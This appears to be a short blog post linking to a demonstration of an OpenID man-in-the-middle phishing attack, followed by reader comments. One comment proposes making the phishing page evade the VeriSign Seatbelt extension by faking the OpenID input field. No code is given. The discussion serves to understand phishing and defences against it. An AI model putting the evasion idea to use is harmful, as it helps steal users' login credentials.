OpenID phishing demo (via) A demonstration of the OpenID man-in-the-middle phishing attack. idproxy.net OpenIDs are immune to this particular variant due to the landing page not asking for your password (the phishing site could still provide their own redesigned landing page and hope users don’t notice though).
Sign in with 
OpenID
I couldn't figure out where to click to submit the form. I put in my OpenID (my domain name) and clicking on the submit button just bought down a list of OpenID places. So I clicked on "Other OpenID" but that just reset the form, making me have to retype my OpenID. I tried it again, but just clicking the submit button...again. Still didn't work. So I pressed enter, to submit it. Then it apparently submitted, but it just gave me a blank page. I'm currently delegating to claimid.com, so maybe they're immune too?
Very neat attack; the use of a proxy makes for a very convincing Phish page.
One improvement of the attack, which would negate a very significant benefit of the VeriSign seatbelt browser extension, is not actually using an actual OpenID input field, but faking it to look like that. Currently VeriSign detects if you click on an OpenID text field and prompts you to login, bypassing the phish login.
Thank you for the interesting demo. In addition to Yang comments, this attack is simply detected by Sxipper browser extension. I'd like to see an improved demo site soon.